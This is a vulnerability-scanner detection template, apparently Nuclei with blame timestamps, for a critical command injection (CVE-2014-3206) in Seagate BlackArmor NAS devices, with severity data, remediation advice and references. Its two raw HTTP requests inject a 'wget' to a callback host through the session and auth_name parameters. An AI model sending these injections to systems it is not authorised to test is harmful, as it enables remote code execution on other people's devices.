2022-01-10 12:37:23 +00:00
id : CVE-2014-3206
info :
2022-01-11 09:27:24 +00:00
name : Seagate BlackArmor NAS - Command Injection
2022-01-10 12:37:23 +00:00
author : gy741
severity : critical
description : Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.
2022-01-10 12:37:23 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2014-3206
- https://www.exploit-db.com/exploits/33159
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/33159/
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-01-10 12:37:23 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-10 12:37:23 +00:00
cve-id : CVE-2014-3206
cwe-id : CWE-20
2024-03-23 09:28:19 +00:00
epss-score : 0.2561
2024-04-08 11:30:07 +00:00
epss-percentile : 0.96608
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : seagate
product : blackarmor_nas_220_firmware
2024-01-14 09:21:50 +00:00
tags : cve2014,cve,seagate,rce,edb
2022-01-10 12:37:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-10 12:37:23 +00:00
- raw :
- |
GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1
Host : {{Hostname}}
Accept : */*
unsafe : true
matchers :
- type : word
part : interactsh_protocol
words :
- "http"
2024-03-25 11:57:16 +00:00
# digest: 4b0a0048304602210084fdfe8223f0c72620f0976f86aadea33cecd5f4da5c912ff8f27a59b8c96b39022100b9cd38bc2986571e7381de6c7d34b8a2932510b6bd05300664e1405de397c6c0:922c64590222798bb761d5b6d8e72950